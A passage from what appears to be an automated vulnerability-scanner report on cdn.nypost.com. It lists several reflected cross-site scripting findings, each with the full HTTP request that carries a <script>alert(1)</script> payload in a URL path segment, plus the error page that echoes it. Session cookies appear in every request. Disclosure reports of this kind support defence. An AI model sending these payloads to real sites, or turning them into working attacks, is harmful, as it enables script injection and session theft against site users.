Referer: http://search.nypost.com/search?q=%60&sort=date%3AD%3AS%3Ad1&entsp=a&client=redesign_frontend&entqr=0&oe=UTF-8&ud=1&getfields=*&proxystylesheet=redesign_frontend&output=xml_no_dtd&site=default_collection&filter=p&search_submit=Search
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.41 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UnicaID=bHMpUfJ6H2F-Wob5vOe; sb_session_id=a5e25089-a427-4cd1-989e-ef5e82dd5c50; sb_permanent_id=f93674eb-8753-41c4-98a9-595d10169a4f; sb_persisted=eyJmdnQiOiIxMjg2NjQ1Mjg1Iiwidm4iOiIzIiwic3N0IjoiMTI4ODY0NzM4NCIsInNwdCI6MTI4ODY0NzM5NSwic3BkIjoyLCJucHYiOjUsInN1ciI6IiJ9

Response

HTTP/1.1 404 Not Found
Content-Type: text/html;charset=UTF-8
Content-Length: 716
Vary: Accept-Encoding
Date: Mon, 01 Nov 2010 21:53:56 GMT
Connection: close

<html><head><title>M..thode Portal - Error</title><style> * { font-family: arial; color: #666666; } h1 { padding: 2px; background-color: #0E5582; color: #FFFFFF; } h2 { margin: 2px 0px 2px 0px; } p {
...[SNIP]...
<p>/r/SysConfig/WebPortal94a89<script>alert(1)</script>34c114d8f35/nypost/scripts/jquery.liscroll.nyp.js</p>
...[SNIP]...

1.98. http://cdn.nypost.com/r/SysConfig/WebPortal/nypost/scripts/jquery.liscroll.nyp.js [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://cdn.nypost.com
Path:   /r/SysConfig/WebPortal/nypost/scripts/jquery.liscroll.nyp.js

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload aac60<script>alert(1)</script>2cc6027c1ac was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /r/SysConfig/WebPortal/nypostaac60<script>alert(1)</script>2cc6027c1ac/scripts/jquery.liscroll.nyp.js HTTP/1.1
Host: cdn.nypost.com
Proxy-Connection: keep-alive
Referer: http://search.nypost.com/search?q=%60&sort=date%3AD%3AS%3Ad1&entsp=a&client=redesign_frontend&entqr=0&oe=UTF-8&ud=1&getfields=*&proxystylesheet=redesign_frontend&output=xml_no_dtd&site=default_collection&filter=p&search_submit=Search
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.41 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UnicaID=bHMpUfJ6H2F-Wob5vOe; sb_session_id=a5e25089-a427-4cd1-989e-ef5e82dd5c50; sb_permanent_id=f93674eb-8753-41c4-98a9-595d10169a4f; sb_persisted=eyJmdnQiOiIxMjg2NjQ1Mjg1Iiwidm4iOiIzIiwic3N0IjoiMTI4ODY0NzM4NCIsInNwdCI6MTI4ODY0NzM5NSwic3BkIjoyLCJucHYiOjUsInN1ciI6IiJ9

Response

HTTP/1.1 404 Not Found
Content-Type: text/html;charset=UTF-8
Content-Length: 716
Vary: Accept-Encoding
Date: Mon, 01 Nov 2010 21:54:05 GMT
Connection: close

<html><head><title>M..thode Portal - Error</title><style> * { font-family: arial; color: #666666; } h1 { padding: 2px; background-color: #0E5582; color: #FFFFFF; } h2 { margin: 2px 0px 2px 0px; } p {
...[SNIP]...
<p>/r/SysConfig/WebPortal/nypostaac60<script>alert(1)</script>2cc6027c1ac/scripts/jquery.liscroll.nyp.js</p>
...[SNIP]...

1.99. http://cdn.nypost.com/r/SysConfig/WebPortal/nypost/scripts/jquery.liscroll.nyp.js [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://cdn.nypost.com
Path:   /r/SysConfig/WebPortal/nypost/scripts/jquery.liscroll.nyp.js

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload 738f1<script>alert(1)</script>0555ca423b7 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /r/SysConfig/WebPortal/nypost/scripts738f1<script>alert(1)</script>0555ca423b7/jquery.liscroll.nyp.js HTTP/1.1
Host: cdn.nypost.com
Proxy-Connection: keep-alive
Referer: http://search.nypost.com/search?q=%60&sort=date%3AD%3AS%3Ad1&entsp=a&client=redesign_frontend&entqr=0&oe=UTF-8&ud=1&getfields=*&proxystylesheet=redesign_frontend&output=xml_no_dtd&site=default_collection&filter=p&search_submit=Search
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.41 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UnicaID=bHMpUfJ6H2F-Wob5vOe; sb_session_id=a5e25089-a427-4cd1-989e-ef5e82dd5c50; sb_permanent_id=f93674eb-8753-41c4-98a9-595d10169a4f; sb_persisted=eyJmdnQiOiIxMjg2NjQ1Mjg1Iiwidm4iOiIzIiwic3N0IjoiMTI4ODY0NzM4NCIsInNwdCI6MTI4ODY0NzM5NSwic3BkIjoyLCJucHYiOjUsInN1ciI6IiJ9

Response

HTTP/1.1 404 Not Found
Content-Type: text/html;charset=UTF-8
Content-Length: 716
Vary: Accept-Encoding
Date: Mon, 01 Nov 2010 21:54:13 GMT
Connection: close

<html><head><title>M..thode Portal - Error</title><style> * { font-family: arial; color: #666666; } h1 { padding: 2px; background-color: #0E5582; color: #FFFFFF; } h2 { margin: 2px 0px 2px 0px; } p {
...[SNIP]...
<p>/r/SysConfig/WebPortal/nypost/scripts738f1<script>alert(1)</script>0555ca423b7/jquery.liscroll.nyp.js</p>
...[SNIP]...

1.100. http://cdn.nypost.com/r/SysConfig/WebPortal/nypost/scripts/jquery.liscroll.nyp.js [REST URL parameter 6]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://cdn.nypost.com
Path:   /r/SysConfig/WebPortal/nypost/scripts/jquery.liscroll.nyp.js

Issue detail

The value of REST URL parameter 6 is copied into the HTML document as plain text between tags. The payload 443c2<script>alert(1)</script>87d16a57803 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /r/SysConfig/WebPortal/nypost/scripts/jquery.liscroll.nyp.js443c2<script>alert(1)</script>87d16a57803 HTTP/1.1
Host: cdn.nypost.com
Proxy-Connection: keep-alive
Referer: http://search.nypost.com/search?q=%60&sort=date%3AD%3AS%3Ad1&entsp=a&client=redesign_frontend&entqr=0&oe=UTF-8&ud=1&getfields=*&proxystylesheet=redesign_frontend&output=xml_no_dtd&site=default_collection&filter=p&search_submit=Search
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.41 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UnicaID=bHMpUfJ6H2F-Wob5vOe; sb_session_id=a5e25089-a427-4cd1-989e-ef5e82dd5c50; sb_permanent_id=f93674eb-8753-41c4-98a9-595d10169a4f; sb_persisted=eyJmdnQiOiIxMjg2NjQ1Mjg1Iiwidm4iOiIzIiwic3N0IjoiMTI4ODY0NzM4NCIsInNwdCI6MTI4ODY0NzM5NSwic3BkIjoyLCJucHYiOjUsInN1ciI6IiJ9

Response

HTTP/1.1 404 Not Found
Content-Type: text/html;charset=UTF-8
Content-Length: 716
Vary: Accept-Encoding
Date: Mon, 01 Nov 2010 21:54:21 GMT
Connection: close

<html><head><title>M..thode Portal - Error</title><style> * { font-family: arial; color: #666666; } h1 { padding: 2px; background-color: #0E5582; color: #FFFFFF; } h2 { margin: 2px 0px 2px 0px; } p {
...[SNIP]...
<p>/r/SysConfig/WebPortal/nypost/scripts/jquery.liscroll.nyp.js443c2<script>alert(1)</script>87d16a57803</p>
...[SNIP]...

1.101. http://cdn.nypost.com/r/SysConfig/WebPortal/nypost/scripts/jquery1.3.1.js [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://cdn.nypost.com
Path:   /r/SysConfig/WebPortal/nypost/scripts/jquery1.3.1.js

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 35f07<script>alert(1)</script>1a0e0870c6e was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /r/SysConfig35f07<script>alert(1)</script>1a0e0870c6e/WebPortal/nypost/scripts/jquery1.3.1.js HTTP/1.1
Host: cdn.nypost.com
Proxy-Connection: keep-alive
Referer: http://search.nypost.com/search?q=%60&sort=date%3AD%3AS%3Ad1&entsp=a&client=redesign_frontend&entqr=0&oe=UTF-8&ud=1&getfields=*&proxystylesheet=redesign_frontend&output=xml_no_dtd&site=default_collection&filter=p&search_submit=Search
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.41 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UnicaID=bHMpUfJ6H2F-Wob5vOe; sb_session_id=a5e25089-a427-4cd1-989e-ef5e82dd5c50; sb_permanent_id=f93674eb-8753-41c4-98a9-595d10169a4f; sb_persisted=eyJmdnQiOiIxMjg2NjQ1Mjg1Iiwidm4iOiIzIiwic3N0IjoiMTI4ODY0NzM4NCIsInNwdCI6MTI4ODY0NzM5NSwic3BkIjoyLCJucHYiOjUsInN1ciI6IiJ9

Response

HTTP/1.1 404 Not Found
Content-Type: text/html;charset=UTF-8
Content-Length: 708
Vary: Accept-Encoding
Date: Mon, 01 Nov 2010 21:53:59 GMT
Connection: close

<html><head><title>M..thode Portal - Error</title><style> * { font-family: arial; color: #666666; } h1 { padding: 2px; background-color: #0E5582; color: #FFFFFF; } h2 { margin: 2px 0px 2px 0px; } p {
...[SNIP]...
<p>/r/SysConfig35f07<script>alert(1)</script>1a0e0870c6e/WebPortal/nypost/scripts/jquery1.3.1.js</p>
...[SNIP]...

1.102. http://cdn.nypost.com/r/SysConfig/WebPortal/nypost/scripts/jquery1.3.1.js [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://cdn.nypost.com
Path:   /r/SysConfig/WebPortal/nypost/scripts/jquery1.3.1.js

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 96dc5<script>alert(1)</script>a652abc5f3b was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /r/SysConfig/WebPortal96dc5<script>alert(1)</script>a652abc5f3b/nypost/scripts/jquery1.3.1.js HTTP/1.1
Host: cdn.nypost.com
Proxy-Connection: keep-alive
Referer: http://search.nypost.com/search?q=%60&sort=date%3AD%3AS%3Ad1&entsp=a&client=redesign_frontend&entqr=0&oe=UTF-8&ud=1&getfields=*&proxystylesheet=redesign_frontend&output=xml_no_dtd&site=default_collection&filter=p&search_submit=Search
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.41 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UnicaID=bHMpUfJ6H2F-Wob5vOe; sb_session_id=a5e25089-a427-4cd1-989e-ef5e82dd5c50; sb_permanent_id=f93674eb-8753-41c4-98a9-595d10169a4f; sb_persisted=eyJmdnQiOiIxMjg2NjQ1Mjg1Iiwidm4iOiIzIiwic3N0IjoiMTI4ODY0NzM4NCIsInNwdCI6MTI4ODY0NzM5NSwic3BkIjoyLCJucHYiOjUsInN1ciI6IiJ9

Response

HTTP/1.1 404 Not Found
Content-Type: text/html;charset=UTF-8
Content-Length: 708
Vary: Accept-Encoding
Date: Mon, 01 Nov 2010 21:54:08 GMT
Connection: close

<html><head><title>M..thode Portal - Error</title><style> * { font-family: arial; color: #666666; } h1 { padding: 2px; background-color: #0E5582; color: #FFFFFF; } h2 { margin: 2px 0px 2px 0px; } p {
...[SNIP]...
<p>/r/SysConfig/WebPortal96dc5<script>alert(1)</script>a652abc5f3b/nypost/scripts/jquery1.3.1.js</p>
...[SNIP]...

1.103. http://cdn.nypost.com/r/SysConfig/WebPortal/nypost/scripts/jquery1.3.1.js [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://cdn.nypost.com
Path:   /r/SysConfig/WebPortal/nypost/scripts/jquery1.3.1.js

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload a68be<script>alert(1)</script>52b89e86413 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /r/SysConfig/WebPortal/nyposta68be<script>alert(1)</script>52b89e86413/scripts/jquery1.3.1.js HTTP/1.1
Host: cdn.nypost.com
Proxy-Connection: keep-alive
Referer: http://search.nypost.com/search?q=%60&sort=date%3AD%3AS%3Ad1&entsp=a&client=redesign_frontend&entqr=0&oe=UTF-8&ud=1&getfields=*&proxystylesheet=redesign_frontend&output=xml_no_dtd&site=default_collection&filter=p&search_submit=Search
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.41 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UnicaID=bHMpUfJ6H2F-Wob5vOe; sb_session_id=a5e25089-a427-4cd1-989e-ef5e82dd5c50; sb_permanent_id=f93674eb-8753-41c4-98a9-595d10169a4f; sb_persisted=eyJmdnQiOiIxMjg2NjQ1Mjg1Iiwidm4iOiIzIiwic3N0IjoiMTI4ODY0NzM4NCIsInNwdCI6MTI4ODY0NzM5NSwic3BkIjoyLCJucHYiOjUsInN1ciI6IiJ9

Response

HTTP/1.1 404 Not Found
Content-Type: text/html;charset=UTF-8
Content-Length: 708
Vary: Accept-Encoding
Date: Mon, 01 Nov 2010 21:54:15 GMT
Connection: close

<html><head><title>M..thode Portal - Error</title><style> * { font-family: arial; color: #666666; } h1 { padding: 2px; background-color: #0E5582; color: #FFFFFF; } h2 { margin: 2px 0px 2px 0px; } p {
...[SNIP]...
<p>/r/SysConfig/WebPortal/nyposta68be<script>alert(1)</script>52b89e86413/scripts/jquery1.3.1.js</p>
...[SNIP]...

1.104. http://cdn.nypost.com/r/SysConfig/WebPortal/nypost/scripts/jquery1.3.1.js [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://cdn.nypost.com
Path:   /r/SysConfig/WebPortal/nypost/scripts/jquery1.3.1.js

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload c3358<script>alert(1)</script>f25f0682a3 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /r/SysConfig/WebPortal/nypost/scriptsc3358<script>alert(1)</script>f25f0682a3/jquery1.3.1.js HTTP/1.1
Host: cdn.nypost.com
Proxy-Connection: keep-alive
Referer: http://search.nypost.com/search?q=%60&sort=date%3AD%3AS%3Ad1&entsp=a&client=redesign_frontend&entqr=0&oe=UTF-8&ud=1&getfields=*&proxystylesheet=redesign_frontend&output=xml_no_dtd&site=default_collection&filter=p&search_submit=Search
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.41 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UnicaID=bHMpUfJ6H2F-Wob5vOe; sb_session_id=a5e25089-a427-4cd1-989e-ef5e82dd5c50; sb_permanent_id=f93674eb-8753-41c4-98a9-595d10169a4f; sb_persisted=eyJmdnQiOiIxMjg2NjQ1Mjg1Iiwidm4iOiIzIiwic3N0IjoiMTI4ODY0NzM4NCIsInNwdCI6MTI4ODY0NzM5NSwic3BkIjoyLCJucHYiOjUsInN1ciI6IiJ9

Response

HTTP/1.1 404 Not Found
Content-Type: text/html;charset=UTF-8
Content-Length: 707
Vary: Accept-Encoding
Date: Mon, 01 Nov 2010 21:54:21 GMT
Connection: close

<html><head><title>M..thode Portal - Error</title><style> * { font-family: arial; color: #666666; } h1 { padding: 2px; background-color: #0E5582; color: #FFFFFF; } h2 { margin: 2px 0px 2px 0px; } p {
...[SNIP]...
<p>/r/SysConfig/WebPortal/nypost/scriptsc3358<script>alert(1)</script>f25f0682a3/jquery1.3.1.js</p>
...[SNIP]...

1.105. http://cdn.nypost.com/r/SysConfig/WebPortal/nypost/scripts/jquery1.3.1.js [REST URL parameter 6]  previous

Summary

Severity:   High
Confidence:   Certain
Host:   http://cdn.nypost.com
Path:   /r/SysConfig/WebPortal/nypost/scripts/jquery1.3.1.js

Issue detail

The value of REST URL parameter 6 is copied into the HTML document as plain text between tags. The payload 5eded<script>alert(1)</script>3518e1143da was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /r/SysConfig/WebPortal/nypost/scripts/jquery1.3.1.js5eded<script>alert(1)</script>3518e1143da HTTP/1.1
Host: cdn.nypost.com
Proxy-Connection: keep-alive
Referer: http://search.nypost.com/search?q=%60&sort=date%3AD%3AS%3Ad1&entsp=a&client=redesign_frontend&entqr=0&oe=UTF-8&ud=1&getfields=*&proxystylesheet=redesign_frontend&output=xml_no_dtd&site=default_collection&filter=p&search_submit=Search
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.41 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UnicaID=bHMpUfJ6H2F-Wob5vOe; sb_session_id=a5e25089-a427-4cd1-989e-ef5e82dd5c50; sb_permanent_id=f93674eb-8753-41c4-98a9-595d10169a4f; sb_persisted=eyJmdnQiOiIxMjg2NjQ1Mjg1Iiwidm4iOiIzIiwic3N0IjoiMTI4ODY0NzM4NCIsInNwdCI6MTI4ODY0NzM5NSwic3BkIjoyLCJucHYiOjUsInN1ciI6IiJ9

Response

HTTP/1.1 404 Not Found
Content-Type: text/html;charset=UTF-8
Content-Length: 708
Vary: Accept-Encoding
Date: Mon, 01 Nov 2010 21:54:28 GMT
Connection: close

<html><head><title>M..thode Portal - Error</title><style> * { font-family: arial; color: #666666; } h1 { padding: 2px; background-color: #0E5582; color: #FFFFFF; } h2 { margin: 2px 0px 2px 0px; } p {
...[SNIP]...
<p>/r/SysConfig/WebPortal/nypost/scripts/jquery1.3.1.js5eded<script>alert(1)</script>3518e1143da</p>
...[SNIP]...

Report generated by Hoyt LLC Research at Thu Nov 04 17:00:14 CDT 2010.